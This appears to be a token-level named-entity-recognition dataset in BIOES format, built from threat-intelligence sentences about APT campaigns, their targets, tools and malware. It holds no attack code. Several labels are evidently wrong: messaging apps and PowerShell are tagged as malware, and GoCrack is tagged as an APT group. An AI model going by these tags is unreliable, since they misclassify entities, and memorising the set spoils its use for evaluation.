+of O
+the O
+attack O
+are O
+delivered O
+only O
+to O
+those O
+who O
+fit O
+the O
+specific O
+victim O
+profile O
+. O
+
+It's O
+coincident O
+that O
+both O
+'darkhydrus' S-APT
+APT O
+group O
+name O
+and O
+‘Williams’ S-APT
+user O
+name O
+in O
+PDB O
+path O
+found O
+in O
+this O
+Twitter B-IDTY
+user E-IDTY
+. O
+
+The O
+360 O
+Intelligence O
+Center O
+observed O
+four O
+distinct O
+campaigns O
+against O
+Pakistan S-LOC
+since O
+2017 O
+(link) O
+, O
+recently O
+targeting O
+Pakistani B-IDTY
+businessmen E-IDTY
+working O
+in O
+China O
+. O
+
+In O
+the O
+latest O
+attack O
+, O
+Donot B-APT
+group E-APT
+is O
+targeting O
+Pakistani B-IDTY
+businessman E-IDTY
+working O
+in O
+China S-LOC
+
+A O
+previous O
+, O
+removed O
+, O
+report O
+from O
+another O
+vendor O
+claimed O
+non-specific O
+information O
+about O
+the O
+groups' S-APT
+interest O
+in O
+Chinese B-IDTY
+universities E-IDTY
+, O
+but O
+that O
+report O
+has O
+been O
+removed O
+– O
+most O
+likely O
+detections O
+were O
+related O
+to O
+students’ O
+and O
+researchers’ O
+scanning O
+known O
+collected O
+samples O
+and O
+any O
+incidents” O
+remain O
+unconfirmed O
+and O
+unknown O
+. O
+
+The O
+most O
+popular O
+targets O
+of O
+SneakyPastes S-APT
+are O
+embassies S-IDTY
+, O
+government B-IDTY
+entities E-IDTY
+, O
+education S-IDTY
+, O
+media B-IDTY
+outlets E-IDTY
+, O
+journalists O
+, O
+activists S-IDTY
+, O
+political O
+parties O
+or O
+personnel S-IDTY
+, O
+healthcare S-IDTY
+and O
+banking S-IDTY
+. O
+
+Through O
+our O
+continuous O
+monitoring O
+of O
+threats O
+during O
+2018 S-TIME
+, O
+we O
+observed O
+a O
+new O
+wave O
+of O
+attacks O
+by O
+Gaza B-APT
+Cybergang I-APT
+Group1 E-APT
+targeting O
+embassies S-IDTY
+and O
+political B-IDTY
+personnel E-IDTY
+. O
+
+This O
+could O
+include O
+diplomats S-IDTY
+, O
+experts O
+in O
+the O
+LOCs O
+of O
+interest O
+related O
+to O
+the O
+Digital O
+Economy O
+Task O
+Force O
+, O
+or O
+possibly O
+even O
+journalists S-IDTY
+. O
+
+This O
+focus O
+on O
+training O
+aligns O
+with O
+LYCEUM’s S-APT
+targeting O
+of O
+executives S-IDTY
+, O
+HR B-IDTY
+staff E-IDTY
+, O
+and O
+IT B-IDTY
+personnel E-IDTY
+. O
+
+Despite O
+the O
+initial O
+perception O
+that O
+the O
+maldoc S-MAL
+sample O
+was O
+intended O
+for O
+ICS S-IDTY
+or O
+OT B-IDTY
+staff E-IDTY
+, O
+LYCEUM S-APT
+has O
+not O
+demonstrated O
+an O
+interest O
+in O
+those O
+environments O
+. O
+
+The O
+threat O
+actor’s S-APT
+emails S-TOOL
+usually O
+contain O
+a O
+picture O
+or O
+a O
+link O
+without O
+a O
+malicious B-FILE
+payload E-FILE
+and O
+are O
+sent O
+out O
+to O
+a O
+huge O
+recipient O
+database O
+of O
+up O
+to O
+85 O
+, O
+000 O
+users S-IDTY
+. O
+
+Group-IB S-SECTEAM
+specialists O
+determined O
+that O
+the O
+email S-TOOL
+addresses O
+of O
+IT O
+bank S-IDTY
+employees S-IDTY
+were O
+among O
+the O
+recipients O
+of O
+these O
+emails S-TOOL
+. O
+
+While O
+OceanLotus’ S-APT
+targets O
+are O
+global O
+, O
+their O
+operations O
+are O
+mostly O
+active O
+within O
+the O
+APAC S-LOC
+region O
+which O
+encompasses O
+targeting O
+private O
+sectors O
+across O
+multiple O
+industries O
+, O
+foreign B-IDTY
+governments E-IDTY
+, O
+activists S-IDTY
+, O
+and O
+dissidents S-IDTY
+connected O
+to O
+Vietnam S-LOC
+. O
+
+The O
+attackers S-APT
+sent O
+multiple O
+emails S-TOOL
+containing O
+macro-enabled O
+XLS B-FILE
+files E-FILE
+to O
+employees B-IDTY
+working I-IDTY
+in I-IDTY
+the I-IDTY
+banking I-IDTY
+sector E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+Examples O
+as O
+early O
+as O
+2008 S-TIME
+document B-FILE
+malware E-FILE
+operations O
+against O
+Tibetan B-IDTY
+non-governmental I-IDTY
+organizations E-IDTY
+( O
+NGOs S-IDTY
+) O
+that O
+also O
+targeted O
+Falun B-IDTY
+Gong E-IDTY
+and O
+Uyghur B-IDTY
+groups E-IDTY
+. O
+
+Based O
+on O
+this O
+, O
+we O
+believe O
+the O
+Rancor S-APT
+attackers S-APT
+were O
+targeting O
+political B-IDTY
+entities E-IDTY
+. O
+
+Other O
+groups S-APT
+, O
+such O
+as O
+Buhtrap S-APT
+, O
+Corkow S-MAL
+and O
+Carbanak S-APT
+, O
+were O
+already O
+known O
+to O
+target O
+and O
+successfully O
+steal O
+money O
+from O
+financial B-IDTY
+institutions E-IDTY
+and O
+their O
+customers S-IDTY
+in O
+Russia S-LOC
+. O
+
+Since O
+last O
+week O
+, O
+iSIGHT B-SECTEAM
+Partners E-SECTEAM
+has O
+worked O
+to O
+provide O
+details O
+on O
+the O
+power O
+outage O
+in O
+Ukraine S-LOC
+to O
+our O
+global O
+customers S-IDTY
+. O
+
+The O
+attacks O
+we O
+attribute O
+to O
+Scarlet B-APT
+Mimic E-APT
+have O
+primarily O
+targeted O
+Uyghur S-IDTY
+and O
+Tibetan B-IDTY
+activists E-IDTY
+as O
+well O
+as O
+those O
+who O
+are O
+interested O
+in O
+their O
+causes O
+. O
+
+The O
+most O
+recent O
+Scarlet B-ACT
+Mimic I-ACT
+attacks E-ACT
+we O
+have O
+identified O
+were O
+conducted O
+in O
+2015 S-TIME
+and O
+suggest O
+the O
+group O
+has O
+a O
+significant O
+interest O
+in O
+both O
+Muslim B-IDTY
+activists E-IDTY
+and O
+those O
+interested O
+in O
+critiques O
+of O
+the O
+Russian B-IDTY
+government E-IDTY
+and O
+Russian S-LOC
+President O
+Vladimir O
+Putin O
+. O
+
+Based O
+on O
+analysis O
+of O
+the O
+data O
+and O
+malware O
+samples O
+we O
+have O
+collected O
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+believes O
+the O
+attacks O
+described O
+herein O
+are O
+the O
+work O
+of O
+a O
+group O
+or O
+set O
+of O
+cooperating O
+groups S-APT
+who O
+have O
+a O
+single O
+mission O
+, O
+collecting O
+information O
+on O
+minority B-IDTY
+groups E-IDTY
+who O
+reside O
+in O
+and O
+around O
+northwestern B-LOC
+China E-LOC
+. O
+
+In O
+the O
+past O
+, O
+Scarlet B-APT
+Mimic E-APT
+has O
+primarily O
+targeted O
+individuals O
+who O
+belong O
+to O
+these O
+minority B-IDTY
+groups E-IDTY
+as O
+well O
+as O
+their O
+supporters S-IDTY
+, O
+but O
+we've O
+recently O
+found O
+evidence O
+to O
+indicate O
+the O
+group O
+also O
+targets O
+individuals O
+working O
+inside O
+government O
+anti-terrorist B-IDTY
+organizations E-IDTY
+. O
+
+Our O
+investigation O
+showed O
+that O
+these O
+attacks O
+were O
+targeted O
+, O
+and O
+that O
+the O
+threat O
+actor O
+sought O
+to O
+steal O
+communications O
+data O
+of O
+specific B-IDTY
+individuals E-IDTY
+in O
+various O
+countries O
+. O
+
+CapabilitiesFormBook S-IDTY
+is O
+a O
+data O
+stealer O
+, O
+but O
+not O
+a O
+full-fledged O
+banker S-IDTY
+. O
+
+While O
+discussions O
+of O
+threats O
+in O
+this O
+region O
+often O
+focus O
+on O
+" O
+North O
+America O
+" O
+generally O
+or O
+just O
+the O
+United O
+States O
+, O
+nearly O
+100 O
+campaigns S-ACT
+during O
+this O
+period O
+were O
+either O
+specifically O
+targeted O
+at O
+Canadian O
+organizations O
+or O
+were O
+customized O
+for O
+Canadian S-LOC
+audiences S-IDTY
+. O
+
+In O
+all O
+emails S-TOOL
+sent O
+to O
+these O
+government B-IDTY
+officials E-IDTY
+, O
+the O
+actor O
+used O
+the O
+same O
+attachment O
+: O
+a O
+malicious B-FILE
+Microsoft I-FILE
+Word I-FILE
+document E-FILE
+that O
+exploited O
+the O
+CVE-2012-0158 S-VULID
+vulnerability O
+to O
+drop O
+a O
+malicious O
+payload O
+. O
+
+In O
+this O
+latest O
+incident O
+, O
+the O
+group O
+registered O
+a O
+fake O
+news O
+domain O
+, O
+timesofindiaa.in O
+, O
+on O
+May B-TIME
+18 E-TIME
+, O
+2016 S-TIME
+, O
+and O
+then O
+used O
+it O
+to O
+send O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+Indian S-LOC
+government B-IDTY
+officials E-IDTY
+on O
+the O
+same O
+day O
+. O
+
+The O
+first O
+time O
+this O
+happened O
+was O
+at O
+the O
+beginning O
+of O
+the O
+month O
+, O
+when O
+Proofpoint S-SECTEAM
+researchers O
+blew O
+the O
+lid O
+off O
+a O
+cyber-espionage B-ACT
+campaign E-ACT
+named O
+Operation B-ACT
+Transparent I-ACT
+Tribe E-ACT
+, O
+which O
+targeted O
+the O
+Indian O
+embassies S-IDTY
+in O
+Saudi B-LOC
+Arabia E-LOC
+and O
+Kazakhstan S-LOC
+. O
+
+Back O
+in O
+February B-TIME
+2016 E-TIME
+, O
+Indian O
+army B-IDTY
+officials E-IDTY
+issued O
+a O
+warning O
+against O
+the O
+usage O
+of O
+three O
+apps O
+, O
+WeChat S-MAL
+, O
+SmeshApp S-MAL
+, O
+and O
+Line S-MAL
+, O
+fearing O
+that O
+these O
+apps O
+collected O
+too O
+much O
+information O
+if O
+installed O
+on O
+smartphones O
+used O
+by O
+Indian O
+army B-IDTY
+personnel E-IDTY
+. O
+
+According O
+to O
+the O
+security B-IDTY
+firm E-IDTY
+, O
+this O
+campaign O
+targeted O
+Indian O
+military B-IDTY
+officials E-IDTY
+via O
+spear-phishing S-ACT
+emails S-TOOL
+, O
+distributing O
+spyware O
+to O
+its O
+victims O
+via O
+an O
+Adobe B-TOOL
+Reader E-TOOL
+vulnerability S-VULNAME
+. O
+
+In O
+addition O
+to O
+these O
+, O
+the O
+Animal O
+Farm O
+attackers O
+used O
+at O
+least O
+one O
+unknown O
+, O
+mysterious O
+malware O
+during O
+an O
+operation O
+targeting O
+computer O
+users S-IDTY
+in O
+Burkina O
+Faso O
+. O
+
+PLATINUM S-APT
+'s O
+persistent O
+use O
+of O
+spear B-ACT
+phishing I-ACT
+tactics E-ACT
+( O
+phishing S-ACT
+attempts O
+aimed O
+at O
+specific B-IDTY
+individuals E-IDTY
+) O
+and O
+access O
+to O
+previously O
+undiscovered O
+zero-day S-VULNAME
+exploits O
+have O
+made O
+it O
+a O
+highly O
+resilient O
+threat O
+. O
+
+The O
+group O
+'s O
+persistent O
+use O
+of O
+spear B-ACT
+phishing I-ACT
+tactics E-ACT
+( O
+phishing S-ACT
+attempts O
+aimed O
+at O
+specific B-IDTY
+individuals E-IDTY
+) O
+and O
+access O
+to O
+previously O
+undiscovered O
+zero-day S-VULNAME
+exploits O
+have O
+made O
+it O
+a O
+highly O
+resilient O
+threat O
+. O
+
+Researching O
+this O
+attack O
+and O
+the O
+malware O
+used O
+therein O
+led O
+Microsoft S-IDTY
+to O
+discover O
+other O
+instances O
+of O
+PLATINUM S-APT
+attacking O
+users S-IDTY
+in O
+India S-LOC
+around O
+August B-TIME
+2015 E-TIME
+. O
+
+The O
+Poseidon B-APT
+Group E-APT
+actively O
+targets O
+this O
+sort O
+of O
+corporate O
+environment O
+for O
+the O
+theft O
+of O
+intellectual O
+property O
+and O
+commercial O
+information O
+, O
+occasionally O
+focusing O
+on O
+personal O
+information O
+on O
+executives S-IDTY
+. O
+
+The O
+previous O
+two O
+volumes O
+of O
+the O
+Microsoft S-IDTY
+Security O
+Intelligence O
+Report O
+explored O
+the O
+activities S-ACT
+of O
+two O
+such O
+groups S-APT
+, O
+code-named O
+STRONTIUM S-APT
+and O
+PLATINUM S-APT
+, O
+which O
+used O
+previously O
+unknown O
+vulnerabilities O
+and O
+aggressive O
+, O
+persistent O
+techniques O
+to O
+target O
+specific B-IDTY
+individuals E-IDTY
+and O
+institutions S-IDTY
+— O
+often O
+including O
+military S-IDTY
+installations O
+, O
+intelligence B-IDTY
+agencies E-IDTY
+, O
+and O
+other O
+government S-IDTY
+bodies O
+. O
+
+Mark B-IDTY
+Zuckerberg E-IDTY
+, O
+Jack B-IDTY
+Dorsey E-IDTY
+, O
+Sundar B-IDTY
+Pichai E-IDTY
+, O
+and O
+Daniel B-IDTY
+Ek E-IDTY
+— O
+the O
+CEOs S-IDTY
+of O
+Facebook S-IDTY
+, O
+Twitter S-IDTY
+, O
+Google S-IDTY
+and O
+Spotify O
+, O
+respectively O
+— O
+have O
+also O
+fallen O
+victim O
+to O
+the O
+hackers O
+, O
+dispelling O
+the O
+notion O
+that O
+a O
+career O
+in O
+software O
+and O
+technology S-IDTY
+exempts O
+one O
+from O
+being O
+compromised O
+. O
+
+The O
+group O
+is O
+well O
+known O
+: O
+They O
+hijacked O
+WikiLeaks' S-SECTEAM
+DNS S-PROT
+last O
+month O
+shortly O
+after O
+they O
+took O
+over O
+HBO O
+'s O
+Twitter S-IDTY
+account O
+; O
+last O
+year O
+, O
+they O
+took O
+over O
+Mark B-IDTY
+Zuckerberg E-IDTY
+'s O
+Twitter S-IDTY
+and O
+Pinterest S-IDTY
+accounts O
+; O
+and O
+they O
+hit O
+both O
+BuzzFeed S-IDTY
+and O
+TechCrunch S-IDTY
+not O
+long O
+after O
+that O
+. O
+
+OurMine S-APT
+is O
+well O
+known O
+: O
+They O
+hijacked O
+WikiLeaks' S-SECTEAM
+DNS S-PROT
+last O
+month O
+shortly O
+after O
+they O
+took O
+over O
+HBO O
+'s O
+Twitter S-IDTY
+account O
+; O
+last O
+year O
+, O
+they O
+took O
+over O
+Mark B-IDTY
+Zuckerberg E-IDTY
+'s O
+Twitter S-IDTY
+and O
+Pinterest S-IDTY
+accounts O
+; O
+and O
+they O
+hit O
+both O
+BuzzFeed S-IDTY
+and O
+TechCrunch S-IDTY
+not O
+long O
+after O
+that O
+. O
+
+Probably O
+the O
+most O
+high-profile O
+attack O
+that O
+GandCrab S-MAL
+was O
+behind O
+is O
+a O
+series O
+of O
+infections O
+at O
+customers S-IDTY
+of O
+remote O
+IT B-IDTY
+support I-IDTY
+firms E-IDTY
+in O
+the O
+month O
+of O
+February O
+. O
+
+Further O
+tracking O
+of O
+the O
+Lazarus’s S-APT
+activities O
+has O
+enabled O
+Kaspersky S-SECTEAM
+researchers O
+to O
+discover O
+a O
+new O
+operation O
+, O
+active O
+since O
+at O
+least O
+November B-TIME
+2018 E-TIME
+, O
+which O
+utilizes O
+PowerShell S-MAL
+to O
+control O
+Windows S-OS
+systems O
+and O
+Mac O
+OS O
+malware O
+to O
+target O
+Apple B-IDTY
+customers E-IDTY
+. O
+
+Users S-IDTY
+who O
+failed O
+to O
+patch O
+their O
+systems O
+may O
+find O
+themselves O
+mining O
+cryptocurrency O
+for O
+threat O
+actors S-APT
+. O
+
+Keeping O
+in O
+mind O
+the O
+sensitivity O
+of O
+passwords O
+, O
+GoCrack S-APT
+includes O
+an O
+entitlement-based O
+system O
+that O
+prevents O
+users O
+from O
+accessing O
+task O
+data O
+unless O
+they O
+are O
+the O
+original O
+creator O
+or O
+they O
+grant O
+additional B-IDTY
+users E-IDTY
+to O
+the O
+task O
+. O
+
+The O
+threat O
+actor’s S-APT
+emails S-TOOL
+usually O
+contain O
+a O
+picture O
+or O
+a O
+link O
+without O
+a O
+malicious B-FILE
+payload E-FILE
+and O
+are O
+sent O
+out O
+to O
+a O
+huge O
+recipient O
+database O
+of O
+up O
+to O
+85 O
+, O
+000 O
+users S-IDTY
+. O
+
+The O
+admin@338 S-APT
+previous O
+activities S-ACT
+against O
+financial S-IDTY
+and O
+policy B-IDTY
+organizations E-IDTY
+have O
+largely O
+focused O
+on O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+written O
+in O
+English O
+, O
+destined O
+for O
+Western S-LOC
+audiences S-IDTY
+. O
+
+This O
+week O
+the O
+experts O
+at O
+FireEye S-SECTEAM
+discovered O
+that O
+a O
+group O
+of O
+Chinese-based S-LOC
+hackers O
+called O
+admin@338 S-APT
+had O
+sent O
+multiple O
+MH370-themed O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+, O
+the O
+attackers S-APT
+targeted O
+government B-IDTY
+officials E-IDTY
+in O
+Asia-Pacific S-LOC
+, O
+it O
+is O
+likely O
+for O
+cyber B-APT
+espionage E-APT
+purpose O
+. O
+
+The O
+attackers S-APT
+used O
+the O
+popular O
+Poison B-MAL
+Ivy I-MAL
+RAT E-MAL
+and O
+WinHTTPHelper S-MAL
+malware S-MAL
+to O
+compromise O
+the O
+computers O
+of O
+government B-IDTY
+officials E-IDTY
+. O
+
+The O
+admin@338 S-APT
+used O
+the O
+popular O
+Poison B-MAL
+Ivy I-MAL
+RAT E-MAL
+and O
+WinHTTPHelper S-MAL
+malware S-MAL
+to O
+compromise O
+the O
+computers O
+of O
+government B-IDTY
+officials E-IDTY
+. O
+
+The O
+group O
+previous O
+activities S-ACT
+against O
+financial S-IDTY
+and O
+policy B-IDTY
+organizations E-IDTY
+have O
+largely O
+focused O
+on O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+written O
+in O
+English O
+, O
+destined O
+for O
+Western S-LOC
+audiences S-IDTY
+. O
+
+The O
+targets O
+were O
+similar O
+to O
+a O
+2015 S-TIME
+TG-4127 B-ACT
+campaign E-ACT
+— O
+individuals O
+in O
+Russia S-LOC
+and O
+the O
+former B-LOC
+Soviet E-LOC
+states O
+, O
+current O
+and O
+former O
+military S-IDTY
+and O
+government B-IDTY
+personnel E-IDTY
+in O
+the O
+U.S. S-LOC
+and O
+Europe S-LOC
+, O
+individuals O
+working O
+in O
+the O
+defense S-IDTY
+and O
+government S-IDTY
+supply O
+chain O
+, O
+and O
+authors S-IDTY
+and O
+journalists S-IDTY
+— O
+but O
+also O
+included O
+email S-ACT
+accounts O
+linked O
+to O
+the O
+November B-TIME
+2016 E-TIME
+United B-LOC
+States E-LOC
+presidential O
+election O
+. O
+
+APT28 B-ACT
+espionage I-ACT
+activity E-ACT
+has O
+primarily O
+targeted O
+entities O
+in O
+the O
+U.S. S-LOC
+, O
+Europe S-LOC
+, O
+and O
+the O
+countries O
+of O
+the O
+former B-LOC
+Soviet I-LOC
+Union E-LOC
+, O
+including O
+governments S-IDTY
+, O
+militaries S-IDTY
+, O
+defense B-IDTY
+attaches E-IDTY
+, O
+media B-IDTY
+entities E-IDTY
+, O
+and O
+dissidents S-IDTY
+and O
+figures S-IDTY
+opposed O
+to O
+the O
+current O
+Russian B-IDTY
+government E-IDTY
+. O
+
+APT28 B-ACT
+espionage I-ACT
+activity E-ACT
+has O
+primarily O
+targeted O
+entities O
+in O
+the O
+U.S. S-LOC
+, O
+Europe S-LOC
+, O
+and O
+the O
+countries O
+of O
+the O
+former B-LOC
+Soviet I-LOC
+Union E-LOC
+, O
+including O
+governments S-IDTY
+and O
+militaries S-IDTY
+, O
+defense B-IDTY
+attaches E-IDTY
+, O
+media B-IDTY
+entities E-IDTY
+, O
+and O
+dissidents S-IDTY
+and O
+figures S-IDTY
+opposed O
+to O
+the O
+current O
+Russian B-IDTY
+government E-IDTY
+. O
+
+APT28 S-APT
+targets O
+Russian S-LOC
+rockers S-IDTY
+and O
+dissidents B-IDTY
+Pussy I-IDTY
+Riot E-IDTY
+via O
+spear-phishing S-ACT
+emails S-TOOL
+. O
+
+We O
+have O
+reasons O
+to O
+believe O
+that O
+the O
+operators S-APT
+of O
+the O
+APT28 S-APT
+network O
+are O
+either O
+Russian S-LOC
+citizens S-IDTY
+or O
+citizens S-IDTY
+of O
+a O
+neighboring O
+country O
+that O
+speak O
+Russian S-LOC
+. O
+
+Russian S-LOC
+citizens—journalists S-IDTY
+, O
+software B-IDTY
+developers E-IDTY
+, O
+politicians S-IDTY
+, O
+researchers B-IDTY
+at I-IDTY
+universities E-IDTY
+, O
+and O
+artists S-IDTY
+are O
+also O
+targeted O
+by O
+Pawn B-APT
+Storm E-APT
+. O
+
+In O
+addition O
+to O
+focused O
+targeting O
+of O
+the O
+private O
+sector O
+with O
+ties O
+to O
+Vietnam S-LOC
+, O
+APT32 S-APT
+has O
+also O
+targeted O
+foreign O
+governments S-IDTY
+, O
+as O
+well O
+as O
+Vietnamese S-LOC
+dissidents S-IDTY
+and O
+journalists S-IDTY
+since O
+at O
+least O
+2013 S-TIME
+. O
+
+In O
+2014 S-TIME
+, O
+APT32 S-APT
+leveraged O
+a O
+spear-phishing S-ACT
+attachment E-ACT
+titled O
+" O
+Plans O
+to O
+crackdown O
+on O
+protesters O
+at O
+the O
+Embassy O
+of O
+Vietnam.exe S-FILE
+, O
+" O
+which O
+targeted O
+dissident O
+activity O
+among O
+the O
+Vietnamese S-LOC
+diaspora S-IDTY
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+In O
+2017 S-TIME
+, O
+social B-IDTY
+engineering E-IDTY
+content O
+in O
+lures O
+used O
+by O
+the O
+actor S-APT
+provided O
+evidence O
+that O
+they O
+were O
+likely O
+used O
+to O
+target O
+members O
+of O
+the O
+Vietnam S-LOC
+diaspora S-IDTY
+in O
+Australia S-LOC
+as O
+well O
+as O
+government B-IDTY
+employees E-IDTY
+in O
+the O
+Philippines S-LOC
+. O
+
+APT33 S-APT
+sent O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+employees S-IDTY
+whose O
+jobs O
+related O
+to O
+the O
+aviation B-IDTY
+industry E-IDTY
+. O
+
+APT37 S-APT
+targeted O
+a O
+research B-IDTY
+fellow E-IDTY
+, O
+advisory B-IDTY
+member E-IDTY
+, O
+and O
+journalist S-IDTY
+associated O
+with O
+different O
+North B-LOC
+Korean E-LOC
+human O
+rights O
+issues O
+and O
+strategic B-IDTY
+organizations E-IDTY
+. O
+
+The O
+majority O
+of O
+APT37 B-ACT
+activity E-ACT
+continues O
+to O
+target O
+South B-LOC
+Korea E-LOC
+, O
+North B-LOC
+Korean E-LOC
+defectors S-IDTY
+, O
+and O
+organizations O
+and O
+individuals O
+involved O
+in O
+Korean B-LOC
+Peninsula E-LOC
+reunification O
+efforts O
+. O
+
+In O
+May B-TIME
+2017 E-TIME
+, O
+APT37 S-APT
+used O
+a O
+bank O
+liquidation O
+letter O
+as O
+a O
+spear B-ACT
+phishing I-ACT
+lure E-ACT
+against O
+a O
+board B-IDTY
+member E-IDTY
+of O
+a O
+Middle B-LOC
+Eastern E-LOC
+financial B-IDTY
+company E-IDTY
+. O
+
+Per O
+the O
+complaint O
+, O
+the O
+email S-ACT
+account O
+watsonhenny@gmail.com S-EMAIL
+was O
+used O
+to O
+send O
+LinkedIn O
+invitations O
+to O
+employees S-IDTY
+of O
+a O
+bank O
+later O
+targeted O
+by O
+APT38 S-APT
+. O
+
+The O
+APT38 S-APT
+uses O
+DYEPACK S-MAL
+to O
+manipulate O
+the O
+SWIFT O
+transaction O
+records O
+and O
+hide O
+evidence O
+of O
+the O
+malicious O
+transactions O
+, O
+so O
+bank B-IDTY
+personnel E-IDTY
+are O
+none O
+the O
+wiser O
+when O
+they O
+review O
+recent O
+transactions O
+. O
+
+APT39 S-APT
+'s O
+focus O
+on O
+the O
+telecommunications B-IDTY
+and I-IDTY
+travel I-IDTY
+industries E-IDTY
+suggests O
+intent O
+to O
+perform O
+monitoring O
+, O
+tracking O
+, O
+or O
+surveillance O
+operations O
+against O
+specific B-IDTY
+individuals E-IDTY
+, O
+collect O
+proprietary O
+or O
+customer O
+data O
+for O
+commercial O
+or O
+operational O
+purposes O
+that O
+serve O
+strategic O
+requirements O
+related O
+to O
+national O
+priorities O
+, O
+or O
+create O
+additional O
+accesses O
+and O
+vectors O
+to O
+facilitate O
+future O
+campaigns S-ACT
+. O
+
+Other O
+groups S-APT
+attributed O
+to O
+Iranian S-LOC
+attackers S-APT
+, O
+such O
+as O
+Rocket B-APT
+Kitten E-APT
+, O
+have O
+targeted O
+Iranian S-LOC
+individuals O
+in O
+the O
+past O
+, O
+including O
+anonymous B-IDTY
+proxy I-IDTY
+users E-IDTY
+, O
+researchers S-IDTY
+, O
+journalists S-IDTY
+, O
+and O
+dissidents S-IDTY
+. O
+
+We O
+believe O
+that O
+the O
+Carbanak S-MAL
+campaign O
+is O
+a O
+clear O
+indicator O
+of O
+a O
+new O
+era O
+in O
+cybercrime O
+in O
+which O
+criminals S-APT
+use O
+APT B-ACT
+techniques E-ACT
+directly O
+against O
+the O
+financial B-IDTY
+industry E-IDTY
+instead O
+of O
+through O
+its O
+customers S-IDTY
+. O
+
+Carbanak S-MAL
+has O
+its O
+origin O
+in O
+more O
+common O
+financial O
+fraud O
+including O
+theft O
+from O
+consumer S-IDTY
+and O
+corporate O
+bank O
+accounts O
+in O
+Europe S-LOC
+and O
+Russia S-LOC
+, O
+using O
+standard O
+banking O
+malware O
+, O
+mainly O
+Carberp S-MAL
+. O
+
+The O
+group O
+has O
+its O
+origin O
+in O
+more O
+common O
+financial O
+fraud O
+including O
+theft O
+from O
+consumer S-IDTY
+and O
+corporate O
+bank O
+accounts O
+in O
+Europe S-LOC
+and O
+Russia S-LOC
+, O
+using O
+standard O
+banking O
+malware O
+, O
+mainly O
+Carberp S-MAL
+. O
+
+Gallmaker S-APT
+'s O
+targets O
+are O
+embassies S-IDTY
+of O
+an O
+Eastern B-LOC
+European E-LOC
+country O
+. O
+
+However O
+, O
+in O
+September S-TIME
+last O
+year O
+, O
+our O
+friends O
+at O
+CSIS S-SECTEAM
+published O
+a O
+blog O
+detailing O
+a O
+new O
+Carbanak S-MAL
+variant O
+affecting O
+one O
+of O
+its O
+customers S-IDTY
+. O
+
+360 S-SECTEAM
+and O
+Tuisec S-SECTEAM
+already O
+identified O
+some O
+Gorgon B-APT
+Group E-APT
+members S-IDTY
+. O
+
+Symantec S-SECTEAM
+also O
+confirmed O
+seeing O
+the O
+Lazarus S-APT
+wiper O
+tool O
+in O
+Poland S-LOC
+at O
+one O
+of O
+their O
+customers S-IDTY
+. O
+
+This O
+new O
+campaign O
+, O
+dubbed O
+HaoBao S-ACT
+, O
+resumes O
+Lazarus S-APT
+' O
+previous O
+phishing B-ACT
+emails S-TOOL
+, O
+posed O
+as O
+employee O
+recruitment O
+, O
+but O
+now O
+targets O
+Bitcoin B-IDTY
+users E-IDTY
+and O
+global O
+financial B-IDTY
+organizations E-IDTY
+. O
+
+Beginning O
+in O
+2017 S-TIME
+, O
+the O
+Lazarus B-APT
+group E-APT
+heavily O
+targeted O
+individuals O
+with O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+impersonating O
+job B-IDTY
+recruiters E-IDTY
+which O
+contained O
+malicious O
+documents O
+. O
+
+We O
+concluded O
+that O
+Lazarus B-APT
+Group E-APT
+was O
+responsible O
+for O
+WannaCry S-MAL
+, O
+a O
+destructive O
+attack O
+in O
+May S-TIME
+that O
+targeted O
+Microsoft B-IDTY
+customers E-IDTY
+. O
+
+The O
+targeting O
+of O
+this O
+individual S-IDTY
+suggests O
+the O
+actors S-APT
+are O
+interested O
+in O
+breaching O
+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+itself O
+or O
+gaining O
+insights O
+into O
+relations O
+between O
+France S-LOC
+and O
+Taiwan S-LOC
+. O
+
+On O
+November B-TIME
+10 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+threat O
+actors S-APT
+sent O
+a O
+spear-phishing S-ACT
+email E-ACT
+to O
+an O
+individual S-IDTY
+at O
+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+. O
+
+On O
+November B-TIME
+10 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+Lotus B-APT
+Blossom E-APT
+sent O
+a O
+spear-phishing S-ACT
+email E-ACT
+to O
+an O
+individual S-IDTY
+at O
+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+. O
+
+APT B-APT
+threat I-APT
+actors E-APT
+, O
+most O
+likely O
+nation O
+state-sponsored O
+, O
+targeted O
+a O
+diplomat S-IDTY
+in O
+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+with O
+a O
+seemingly O
+legitimate O
+invitation O
+to O
+a O
+technology O
+conference O
+in O
+Taiwan S-LOC
+. O
+
+Additionally O
+, O
+the O
+targeting O
+of O
+a O
+French B-IDTY
+diplomat E-IDTY
+based O
+in O
+Taipei O
+, O
+Taiwan S-LOC
+aligns O
+with O
+previous O
+targeting O
+by O
+these O
+actors S-APT
+, O
+as O
+does O
+the O
+separate O
+infrastructure O
+. O
+
+Since O
+at O
+least O
+2014 S-TIME
+, O
+APT32 S-APT
+, O
+also O
+known O
+as O
+the O
+OceanLotus B-APT
+Group E-APT
+, O
+has O
+targeted O
+foreign B-IDTY
+corporations E-IDTY
+with O
+investments O
+in O
+Vietnam S-LOC
+, O
+foreign B-IDTY
+governments E-IDTY
+, O
+journalists S-IDTY
+, O
+and O
+Vietnamese S-LOC
+dissidents S-IDTY
+. O
+
+APT35 S-APT
+typically O
+targets O
+U.S. S-LOC
+and O
+the O
+Middle B-LOC
+Eastern E-LOC
+military S-IDTY
+, O
+diplomatic S-IDTY
+and O
+government B-IDTY
+personnel E-IDTY
+, O
+organizations S-IDTY
+in O
+the O
+media S-IDTY
+, O
+energy S-IDTY
+and O
+defense B-IDTY
+industrial I-IDTY
+base E-IDTY
+( O
+DIB S-IDTY
+) O
+, O
+and O
+engineering S-IDTY
+, O
+business B-IDTY
+services E-IDTY
+and O
+telecommunications B-IDTY
+sectors E-IDTY
+. O
+
+COBALT B-APT
+GYPSY E-APT
+has O
+used O
+spearphishing S-ACT
+to O
+target O
+telecommunications S-IDTY
+, O
+government S-IDTY
+, O
